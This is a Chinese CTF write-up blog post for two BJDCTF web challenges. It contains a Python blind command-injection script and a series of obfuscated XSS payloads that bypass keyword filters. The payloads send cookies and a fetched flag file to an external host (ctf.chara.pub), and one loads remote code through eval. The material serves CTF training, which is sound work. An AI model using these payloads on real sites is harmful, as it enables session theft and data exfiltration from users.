BJDCTF 3rd web两道题writeup
发表于:2020-05-23 |

Web-帮帮小红花

和i春秋圣诞赛的cut盲注类似,各种方法盲注flag即可,注意&要转义。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import string
import requests
proxies={"http":"http://127.0.0.1:4476"}
pay = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_"
result = ""
while True:
for i in pay:
try:
requests.get("http://183.129.189.60:10074/?imagin=grep \"^%s\" /flag %%26%%26 sleep 10"%(result+i),timeout=5,proxies=proxies)
continue;
except KeyboardInterrupt as e:
exit(0)
except:
result+=i
print(result)
break;

Web-notes

源码提示leak,访问www.zip得到源码

1
<body onpageshow=alert(1) >

子元素是body会被浏览器修补到body的属性里去,这样视同html>body有onpageshow属性

1
2
3
4
5
6
7
<body onpageshow=window['location'].href=/111/ >

(/l/+1)[1]

<body onpageshow=window[(/l/+1)[1]+(/o/+1)[1]+(/c/+1)[1]+(/a/+1)[1]+(/t/+1)[1]+(/i/+1)[1]+(/o/+1)[1]+(/n/+1)[1]].href=(/h/+1)[1]+(/t/+1)[1]+(/t/+1)[1]+(/p/+1)[1]+(/:/+1)[1]+(/\//+1)[1]+(/\//+1)[1]+(/a/+1)[1]+(/p/+1)[1]+(/i/+1)[1]+(/./+1)[1]+(/c/+1)[1]+(/h/+1)[1]+(/a/+1)[1]+(/r/+1)[1]+(/a/+1)[1]+(/./+1)[1]+(/p/+1)[1]+(/u/+1)[1]+(/b/+1)[1]+(/\//+1)[1]+document[(/c/+1)[1]+(/o/+1)[1]+(/o/+1)[1]+(/k/+1)[1]+(/i/+1)[1]+(/e/+1)[1]] />

http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Dwindow%5B%28%2Fl%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fn%2F%2B1%29%5B1%5D%5D.href%3D%28%2Fh%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Ft%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2F%3A%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2F.%2F%2B1%29%5B1%5D%2B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fh%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2Fr%2F%2B1%29%5B1%5D%2B%28%2Fa%2F%2B1%29%5B1%5D%2B%28%2F.%2F%2B1%29%5B1%5D%2B%28%2Fp%2F%2B1%29%5B1%5D%2B%28%2Fu%2F%2B1%29%5B1%5D%2B%28%2Fb%2F%2B1%29%5B1%5D%2B%28%2F%5C%2F%2F%2B1%29%5B1%5D%2Bdocument%5B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fo%2F%2B1%29%5B1%5D%2B%28%2Fk%2F%2B1%29%5B1%5D%2B%28%2Fi%2F%2B1%29%5B1%5D%2B%28%2Fe%2F%2B1%29%5B1%5D%5D+%2F%3E

限制url长度500,所以需要优化

1
2
3
4
5
6
7
8
(/http:\/\/ctf.chara.pub\//+1).substring(1,25)
(/l/+1)[1]+(/ocation/+1).substring(1,8)
(/c/+1)[1]+(/ookies/+1).substring(1,7)

<body onpageshow=window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+document[(/c/+1)[1]+(/ookie/+1).substring(1,6)] />


http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Dwindow%5B%28%2Fl%2F%2B1%29%5B1%5D%2B%28%2Focation%2F%2B1%29.substring%281%2C8%29%5D.href%3D%28%2Fhttp%3A%5C%2F%5C%2Fctf.chara.pub%5C%2F%2F%2B1%29.substring%281%2C25%29%2Bdocument%5B%28%2Fc%2F%2B1%29%5B1%5D%2B%28%2Fookie%2F%2B1%29.substring%281%2C6%29%5D+%2F%3E

可以打到admin的phpsessionid,但是没有用

1
2
3
4
5
6
7
8
9
10
11
a=new XMLHttpRequest();a.open("GET","http://ctf.chara.pub",1);a.onreadystatechange=function(){eval(a.responseText)};a.send(null)

a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange (){eval(a.responseText)};a.send(null)

#过滤func,用lambda

(/r/+1)[1]+(/esponseText/+1).substring(1,12)

a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null)

<body onpageshow=a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null) />

csp不允许XMLHttpRequest访问外部地址,那剩下的方法就是getflag然后提交到用户名里

用户名限制格式,要么分段打payload,要么window.location.href

XMLHttpRequest需要一个空格来new,用fetch

1
2
3
4
5
6
7
8
9
fetch("/lib/flag.php",{method:"GET"}).then((r)=>{r.text().then((r)=>{window.location.href="http://ctf.chara.pub/"+r})})


(/\/lib\/flag.php/+1).substring(2,16)
(/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8)

a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})})

<body onpageshow=a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})}) />

=>绕过

直接用eval构造字符串?

题目好像改过,现在的过滤了eval

1
2
3
4
5
6
7
8
9
10
a=String.fromCharCode;
b=(/fetch(12lib2flag.php1,{method:1GET1}).then((r)=3{r.text().then((r)=3{window.location.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b)

#最后的payload
<body onpageshow=a=String.fromCharCode;b=(/5etch(12lib25lag.php1,{method:1GET1}).th6n((r)=3{r.text().th6n((r)=3{window.l7cation.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).replace(/5/g,a(102)).replace(/6/g,a(101)).replace(/7/g,a(111)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b) />

http://172.26.176.1/note.php?note=%3Cbody+onpageshow%3Da%3DString.fromCharCode%3Bb%3D%28%2F5etch%2812lib25lag.php1%2C%7Bmethod%3A1GET1%7D%29.th6n%28%28r%29%3D3%7Br.text%28%29.th6n%28%28r%29%3D3%7Bwindow.l7cation.href%3D1http%3A22a.chara.pub21%2Br%7D%29%7D%29%2F%2B4%29.replace%28%2F1%2Fg%2Ca%2834%29%29.replace%28%2F2%2Fg%2Ca%2847%29%29.replace%28%2F3%2Fg%2Ca%2862%29%29.replace%28%2F5%2Fg%2Ca%28102%29%29.replace%28%2F6%2Fg%2Ca%28101%29%29.replace%28%2F7%2Fg%2Ca%28111%29%29.substring%281%2C120%29%3Bwindow%5B%28%2Fe%2F%2B1%29%5B1%5D%2B%28%2Fval%2F%2B1%29.substring%281%2C4%29%5D%28b%29+%2F%3E



可能长度还是有点过(虽然自己测出来是499),用flask写个302可以打

上一篇:
GKCTF web部分的writeup
下一篇:
友情链接

由于Valine存在安全问题,我们不会记录您的IP地址。您所填入的内容,和您的User-Agent信息将明文公开存储。